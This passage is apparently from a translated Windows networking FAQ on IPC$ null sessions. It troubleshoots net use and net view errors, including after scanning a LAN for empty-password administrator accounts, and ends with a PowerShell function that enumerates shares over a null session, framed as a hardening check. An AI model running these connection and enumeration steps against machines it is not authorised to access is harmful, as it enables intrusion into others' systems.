A: You have confused the relationship between IPC$ and port 139. A host that accepts IPC$ connections must have port 139 or 445 open, but a host with these ports open does not necessarily accept a null session, because the other side can disable IPC$ sharing.
13. Most machines in our LAN run XP. With Fluxay I found several administrator accounts with empty passwords. I can connect, but copying fails with error 5. Why?
A: XP is more secure. In the default security policy, network logons with a local account are authenticated as Guest, so even if you log on remotely as an administrator you only have Guest permissions. Copying a file therefore gives error 5, insufficient permissions.
14. I used net use \\192.168.0.2\IPC$ "password" /user:"Administrator", but net use I: \\192.168.0.2\c
asks me for the password for \\192.168.0.2. How can this be solved? I am an administrator; shouldn't everything be accessible?
A: Although you have Administrator permissions, the administrator may have set share permissions on the C drive that do not allow Administrator access (note: access permissions can be set on ordinary shares but not on default shares), so the above problem can occur.
15. If IPC$ is disabled on my own machine, can I still use IPC$ to connect to other machines? What if the Server service is disabled?
A: With both of those disabled you can still initiate an IPC$ connection. Still, it would be better to test this yourself.
16. Can you tell me the cause of the following two errors?
C:\> net time \\61.225.*.*
System error 5 has occurred.
Access is denied.
C:\> net view \\61.225.*.*
System error 5 has occurred.
Access is denied.
A: When I first met this problem I was puzzled too. Error 5 means insufficient permissions, but even a null session is enough to run these two commands, so why couldn't he? Had he not established a connection? Later the careless comrade told me that that was exactly the case: he had forgotten that he had deleted the IPC$ connection, then entered the two commands above and got error 5.
17. What is going on here?
F:\> net time
Could not locate a time-server.
Type NET HELPMSG 3912 for more help.
A: The answer is simple: your command is wrong. It should be net time \\IP.
No IP address was entered, so of course the server cannot be found. The view command also needs an IP address: net view \\IP.
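Several of the questions above (9, 10, 12, 16) come down to the state of the session you already have with the target. The function below is an added example, not part of the Q&A or of the original article: it wraps net.exe so that a leftover session is removed before a new one is attempted (question 9), tries the null session, lists shares through it (questions 4 and 16) and always tears the session down afterwards (question 1). The host name HOST is a placeholder. The --% and environment-variable trick exists only because PowerShell 5.1 drops empty-string arguments to native commands, so the "" password and /user:"" would never reach net.exe otherwise.

```powershell
# Added example, not from the original article: check whether a target still accepts an
# IPC$ null session, handling the session-state errors discussed in the Q&A above.
function Test-IpcNullSession {
    param([Parameter(Mandatory)][string]$Target)   # e.g. -Target HOST (placeholder)

    $unc = "\\$Target\IPC$"

    # Q9: only one session per client/server pair is allowed, so remove a leftover one
    # instead of running into "The credentials supplied conflict with an existing set".
    if (net use | Select-String -SimpleMatch "\\$Target\") {
        net use $unc /delete /y | Out-Null
    }

    # Q8/Q12: a null session is a connect with an empty password and an empty user name.
    # The literal command line is handed to cmd.exe after --% (PowerShell 5.1 would drop
    # the empty "" argument) and cmd expands the host name from an environment variable.
    $env:IPC_TARGET = $Target
    $out = cmd.exe /c --% net use \\%IPC_TARGET%\IPC$ "" /user:"" 2>&1
    if ($LASTEXITCODE -ne 0) {
        return [pscustomobject]@{
            Target = $Target; NullSession = $false; Shares = @(); Detail = ($out -join ' ').Trim()
        }
    }

    # Q4/Q16: net view through the session lists ordinary shares only, never C$ or ADMIN$;
    # "System error 5" here means the session exists but anonymous listing is restricted.
    $view   = net view "\\$Target" 2>&1
    $shares = @()
    if ($LASTEXITCODE -eq 0) {
        $shares = @($view | Where-Object { $_ -match '^\S+\s+Disk\b' } |
                           ForEach-Object { ($_ -split '\s+')[0] })
    }

    # Q1/Q16: always tear down the session you created; it is visible in net use on your
    # side and in the server's logs on theirs, and a forgotten one causes the next error 5.
    net use $unc /delete /y | Out-Null

    [pscustomobject]@{
        Target = $Target; NullSession = $true; Shares = $shares; Detail = ($view -join ' ').Trim()
    }
}

# Test-IpcNullSession -Target HOST
```

Run it against your own machines after applying the hardening steps from section 14: NullSession should come back $false with "System error 5" or "network path was not found" in Detail, and a host that still answers $true with a share list is one whose IPC$ has not been closed.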
